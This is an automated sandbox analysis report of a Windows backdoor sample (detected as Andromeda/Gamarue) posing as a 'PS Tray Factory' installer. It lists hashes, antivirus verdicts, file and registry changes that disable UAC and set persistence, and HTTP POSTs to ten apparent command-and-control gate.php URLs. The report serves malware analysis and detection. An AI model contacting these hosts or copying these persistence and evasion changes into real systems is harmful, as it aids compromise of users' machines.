Analysis Date: 2015-05-01 05:10:50
MD5: 75dcd4348a88b811bf6dc5eb06f6438e
SHA1: 97d474d39e17005281e7b8eba0ef40ce0db0678f

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 92032f5e50e74fe0fe80a33ba4ca92db sha1: 4ccbaddbb239a58e04ea02027b171f35e16dfb12 size: 23552
Section: .rdata md5: 5801d712ecba58aa87d1e7d1aa24f3aa sha1: 0ec4a63131e982d6c2f062510def1c9cc9289b04 size: 4608
Section: .data md5: f2470ac8847791744aff280e7e2f5353 sha1: 8d1d071e3f45ba87014fced1f57d807c0ccb6577 size: 1024
Section: .ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section: .rsrc md5: daf402792775807c51bb0c669fd8e614 sha1: 7a4e5df23b9fe8b097a9cdb34287f847bb0b31ff size: 10752
Timestamp: 2014-10-07 04:40:17
Version:
LegalCopyright:
FileVersion: 8.4.4.5
CompanyName: PS Soft Lab
ProductName: PS Tray Factory
ProductVersion: 8.4.4.5
FileDescription: PS Tray Factory Setup
Packer: Nullsoft PiMP Stub -> SFX
PEhash: 6d72fc3af1e51f105e2a75a2042fb26a02a3ea00
IMPhash: 59a4a44a250c4cf4f2d9de2b3fe5d95f
AV Ad-Aware: Trojan.GenericKD.2117158
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Trojan.GenericKD.2117158
AV Authentium: W32/Zbot.IZNZ-0912
AV Avira (antivir): TR/Gamarue.A.1137
AV BitDefender: Trojan.GenericKD.2117158
AV BullGuard: Trojan.GenericKD.2117158
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Backdoor.Androm.r5
AV ClamAV: no_virus
AV Dr. Web: BackDoor.Andromeda.404
AV Emsisoft: Trojan.GenericKD.2117158
AV Eset (nod32): Win32/Injector.BTMD
AV Fortinet: W32/BTMD!tr
AV Frisk (f-prot): W32/Zbot.CNZ
AV F-Secure: no_virus
AV Grisoft (avg): Inject2.BMTR
AV Ikarus: Trojan.Win32.Injector
AV K7: no_virus
AV Kaspersky: Backdoor.Win32.Androm.gczl
AV MalwareBytes: Trojan.ZBAgent.NS
AV Mcafee: RDN/Generic BackDoor!bbp
AV Microsoft Security Essentials: Worm:Win32/Gamarue
AV MicroWorld (escan): Trojan.GenericKD.2117158[ZP]
AV Padvish: no_virus
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: Trojan.Gen.2
AV Trend Micro: no_virus
AV Twister: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\03 Speed The Collapse.mp3
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\nsd3.tmp\motorbicycles.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\nst2.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\nsd3.tmp\motorbicycles.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\nsd3.tmp
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\nsy1.tmp
Creates Process: C:\malware.exe

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\system32\msiexec.exe
Creates Process: C:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\system32\msiexec.exe

Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\Explorer\TaskbarNoNotification ➝ NULL
Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\4033585203 ➝ C:\Documents and Settings\All Users\msrhmucm.exe\\x00
Registry: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\advanced\ShowSuperHidden ➝ NULL
Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system\EnableLUA ➝ NULL
Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\Explorer\TaskbarNoNotification ➝ NULL
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp

Process
↳ C:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\Explorer.EXE

Network Details:

HTTP POST: http://poppinga.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://poppingd.info/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://poppingf.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://poppingg.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://poppingh.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://poppingj.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://poppingk.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://poppin33.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://popping33.org/and/gate.php
User-Agent: Mozilla/4.0
HTTP POST: http://popping45.com/and/gate.php
User-Agent: Mozilla/4.0

Raw Pcap

Strings